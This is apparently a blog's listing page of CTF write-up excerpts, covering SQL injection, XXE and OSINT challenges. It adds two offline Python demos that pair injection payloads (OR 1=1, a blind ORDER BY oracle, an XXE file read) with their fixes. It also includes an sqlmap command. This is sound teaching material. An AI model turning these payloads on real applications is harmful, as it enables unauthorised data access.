Posts

ArcticCon 2019 CTF

Arcticcon is a conference by red teamers, for red teamers...and I was lucky enough to attend and participate in their 2019 CTF.

aRcTicCON

First of all, the conference was amazing. The first day was dedicated to the CTF, the second day had a focus on training/labs, and the third day was loaded with presentations that were all informative, inspiring, and packed full of tips, tricks, tools, and advice that I could actually use in my day-to-day.

The CTF had three main components to it, with SE being peppered in as well:
OSINT
Physical
Netpen

I was assigned to team IronMan, along with five others.

OSINT

On May 2nd, 2019, the CTF opened up for teams to begin working on the OSINT challenges.
The Jeopardy style challenge board gave no hints and asked no questions.
Here is an example of a challenge:
Challenge Three

I began this CTF with some bad assumptions concerning when it was held last year, so shortly after I began my hunt for OSINT, I started submitting flags from last year's challenges. Th…

2019 Stonecutters - Bleeding Gums

In honor of Bleeding Gums Murphy, who passed away 24 years ago today, I thought it would be nice to pay tribute to him by publishing my write-up for the Stonecutters' "Bleeding Gums" challenge.

RIP Bleeding Gums
Bleeding Gums was an empty website aside from a single search field as seen below:


index.php
When I searched for the letter "a", I saw the table below:

Search Results
When I searched for the letter "b", I saw a smaller data set returned and some of the artists were different.

Next, I searched for years and album titles but the query only seemed to search for Artists.
Searching for ' gave me the following SQL error:

Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ')'' at line 1

I threw sqlmap at it but I wasn't able to get anything out of it. I then started to play with the injection manually.

With this particular challenge, I notice…

2019 Stonecutters - Fink Does Yoga

The "Fink Does Yoga" website was a very basic login form to schedule a yoga class. No matter what you entered as credentials, the username was reflected back to the user on the next page that loaded and the password given didn't really seem to matter. I started this challenge by fuzzing bad characters to find some kind of injection vulnerability.

I found that entering a "<" as the username gave me an interesting error. Seen below is the complete response:

Warning: DOMDocument::loadXML(): StartTag: invalid element name in Entity, line: 1 in /app/web/login.php on line 22
Warning: simplexml_import_dom(): Invalid Nodetype to import in /app/web/login.php on line 24
Hi there, ! Welcome back. Calendar No spots are available at the moment. Please check back later.
I noticed XML errors in this output so I tried the following XXE injection attack against the username field:
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT f…
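The loadXML() warnings above show the username being handed to an XML parser, which is the precondition for XXE. As an added example, not code from the original post or the challenge, the following Python script uses xml.sax in place of PHP's DOMDocument to show the same mechanic offline: a parser configured to resolve external general entities splices a local file into the reflected username, while the hardened setting leaves the entity empty. The secret file, its contents, the user element name and the render_username/xxe_payload helper names are constructed for the demo.

```python
"""XXE side by side with the fix, using Python's xml.sax.

Added example (not code from the original post or the CTF). The secret
file, its contents and the payload are constructed here so it runs offline.
"""
import io
import os
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects the character data the parser reports for the document."""

    def __init__(self):
        super().__init__()
        self.text = []

    def characters(self, content):
        self.text.append(content)


def render_username(xml_bytes, resolve_external_entities):
    """Parse a login submission the way a naive app might: treat the
    username as XML and echo back its text content.

    resolve_external_entities=True makes the parser fetch SYSTEM entities,
    which is the XXE condition; False is the hardened configuration.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.text)


def xxe_payload(file_uri):
    """Classic XXE payload: declare an external entity pointing at a file
    and reference it in the body so the file is reflected back."""
    return (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        "<!DOCTYPE foo [ <!ELEMENT user ANY >"
        f'<!ENTITY xxe SYSTEM "{file_uri}" >]>\n'
        "<user>&xxe;</user>"
    ).encode("latin-1")


def demo():
    """Write a constructed 'secret' file, then parse the payload with the
    vulnerable and the hardened parser settings. Returns all three values."""
    secret = "flag{constructed-secret-for-the-demo}"  # constructed, not a real flag
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(secret)
        secret_path = fh.name
    try:
        payload = xxe_payload(Path(secret_path).as_uri())
        leaked = render_username(payload, resolve_external_entities=True)
        safe = render_username(payload, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return {"secret": secret, "vulnerable": leaked, "hardened": safe}


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:>10}: {value!r}")
```

The hardened branch is the parser's default in current Python (external general entities are not resolved unless the feature is turned on); the equivalent for the PHP stack in the write-up is to never parse untrusted input with entity substitution enabled.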

2019 Stonecutters - Easy Drinking Duff

Easy Drinking Duff was the first and easiest web app challenge that the Stonecutters had on the board. By the time I got around to it, it was only worth 75 points and it had the most solves of all the web app challenges.

In order to access the challenge, I needed to register my SSH key with the scoring server and run a provided SSH command to access the challenge. I was then able to load the following site by pointing my browser to 127.0.0.1:8080:

Easy Drinking Duff

I then sorted the data set by year by clicking on the "Year" column header which sent a request for: http://127.0.0.1:8080/index.php?s=year
This just screamed database, so I entered a ' at the end of year to see what would happen and I saw the following error message:

SQL Error
This indicated a SQLi vulnerability, so I ran sqlmap, as seen below, to validate the finding by checking who the current user was:

# sqlmap -u "127.0.0.1:8080/index.php?s=year*" --current-user
<snip>
[13:57:38] [INFO] the b…
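The Bleeding Gums search field and the Easy Drinking Duff sort parameter are the same bug in two shapes: user input spliced into SQL text. The following Python script is an added example, not code from the original posts or the CTF. It stands up an in-memory SQLite table of constructed albums in place of the challenges' MariaDB back ends (so the exact error text differs), reproduces the stray-quote error, a search term that rewrites the WHERE clause, and a CASE expression that turns ORDER BY into a one-bit oracle, and puts the fixes beside them: a bound parameter for the search term and an allowlist for the sort column, since identifiers cannot be parameterized. The table name, column names and function names are assumptions.

```python
"""SQL injection in a search field and in a sort parameter, with the fixes.

Added example (not code from the original posts or the CTF). Uses an
in-memory SQLite table of constructed albums instead of MariaDB.
"""
import sqlite3

# Constructed sample data standing in for the challenges' album tables.
# Year order deliberately differs from artist order (see order_by_oracle).
ALBUMS = [
    ("Bleeding Gums Murphy", "Sax on the Beach", 1991),
    ("Apu Nahasapeemapetilon", "Be Sharp", 1985),
    ("Troy McClure", "Planet of the Apes", 1980),
    ("Lurleen Lumpkin", "Bagged Me a Homer", 1992),
]

# The only ORDER BY targets a ?s=<column> parameter should accept.
ALLOWED_SORT_COLUMNS = ("artist", "album", "year")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE albums (artist TEXT, album TEXT, year INTEGER)")
    conn.executemany("INSERT INTO albums VALUES (?, ?, ?)", ALBUMS)
    return conn


def search_vulnerable(conn, term):
    """Search term pasted into the SQL text. A lone ' breaks the statement
    (compare the write-up's "near ')'" error) and a crafted term rewrites
    the WHERE clause."""
    sql = f"SELECT artist, album, year FROM albums WHERE artist LIKE ('%{term}%')"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Bound parameter: the term is data, never SQL, whatever it contains."""
    sql = "SELECT artist, album, year FROM albums WHERE artist LIKE '%' || ? || '%'"
    return conn.execute(sql, (term,)).fetchall()


def sort_vulnerable(conn, column):
    """Sort column pasted into ORDER BY, the pattern ?s=year suggested."""
    sql = f"SELECT artist, album, year FROM albums ORDER BY {column}"
    return conn.execute(sql).fetchall()


def sort_safe(conn, column):
    """Identifiers cannot be bound as parameters, so allowlist them."""
    if column not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {column!r}")
    sql = f"SELECT artist, album, year FROM albums ORDER BY {column}"
    return conn.execute(sql).fetchall()


def syntax_error_for(conn, query_fn, value):
    """Return the database error a stray quote provokes, or None if none."""
    try:
        query_fn(conn, value)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


def order_by_oracle(conn, condition_sql):
    """Blind extraction through ORDER BY: the injected CASE sorts by year
    when condition_sql is true and by artist when it is false, so the row
    order leaks one bit per request even with no error message at all."""
    payload = f"(CASE WHEN {condition_sql} THEN year ELSE artist END)"
    rows = sort_vulnerable(conn, payload)
    return rows == sorted(ALBUMS, key=lambda row: row[2])


def demo():
    """Run every probe against a fresh database and return the results."""
    conn = make_db()
    injected = "zzz') OR 1=1 --"  # closes LIKE (...) and comments out the rest
    return {
        "quote_error": syntax_error_for(conn, search_vulnerable, "'"),
        "injected_rows": len(search_vulnerable(conn, injected)),
        "safe_rows": len(search_safe(conn, injected)),
        "sort_quote_error": syntax_error_for(conn, sort_vulnerable, "year'"),
        "oracle_true": order_by_oracle(conn, "(SELECT count(*) FROM albums) = 4"),
        "oracle_false": order_by_oracle(conn, "1 = 2"),
        "safe_sort_first_artist": sort_safe(conn, "year")[0][0],
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:>22}: {value!r}")
```

The oracle is the reason an ORDER BY injection matters even when the app swallows errors: sqlmap's boolean-based techniques automate exactly this comparison of row order against a known baseline.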

BHIS CTF@Shmoocon 2019 - Blockchain Challenge

I had the Blockchain Challenge, or whatever it was actually called, still kicking around even though Shmoocon and the Black Hills Infosec CTF had ended. I thought this was a neat challenge and I really wanted to figure this one out.


Here's the challenge description:

Thanks for joining our team on this one. We are so close to catching the infamous hacktivist known as "gh0st Plague".
We were informed that he is planning another DDoS attack against a major financial institution. gh0st Plague recruits various botnet owners from around the net and always pays in Bitcoin.
We believe that the following Bitcoin address is one of gh0st Plague's wallets. Knowing where and when gP is making payments should help us catch him but we need some solid evidence. This is where you come in. With your expertise in Blockchain analysis it shouldn't be too hard for you to determine if he let his ego get to him and left any clues behind. Good luck! 3AHnpGWb1EUSYKZUbgxfAkzFfmJeKLL3hH


I remembe…

Al Capwn: Evlz CTF 20190202-20190203

I recently heard of the Evlz CTF from a reddit post in /r/securityCTF by u/coffee-loop. The CTF is put on by Al Capwn, a collaboration of Indian college CTF players with members from eavesdroppers, UPES, and Amrita University. 


Holy macaroni did this competition blow me away! There were so many quality challenges I can't believe it was limited to less than 48 hours. I only had about 6 hours between Saturday and Sunday to put towards the challenges so I was only able to get a few of the "easy" ones.

They had multiple challenges for each of the following categories:
Sanity
Misc
Crypto
Forensics
Web
Pwn
Reverse

I have write-ups for the Sanity challenges as well as two of the Misc challenges.

Let's get started:
Sanity Check 1

1 point. Simply enter the flag that was set for the ctf channel in the evlzctf slack workspace.
evlz{I_pledge_to_play_fair_and_I_promise_to_not_attack_the_infrastructure}ctf
Sanity Check 2

50 points. This challenge provided a link to the following QR code:


I…

BHIS CTF@Shmoocon 2019 - Feeling Blue?

I was lucky enough to score tickets to Shmoocon again and of course I was looking forward to working on a CTF while I was there. Black Hills Information Security had organized a CTF to run at Shmoo which made me super happy as I have a lot of respect for them and was excited to see what they had in store for us players.

Unfortunately, I had to work most of Friday and leave first thing Sunday morning. This left me with only a handful of hours on Saturday to compete as I balanced my time with other con activities.

My coworker, Wole, joined the team and together we reached as high as 13th place in just a few hours. The final scoreboard was still hidden at the time of this writing, but I have a feeling we got knocked down a few spots.

The CTF was powered by MetaCTF and the challenges were categorized as follows:
Cryptography
Reconnaissance
Web Exploitation
Reverse Engineering
Forensics
Other

One challenge that I thought would make for a good blog post to write on the train home was called: …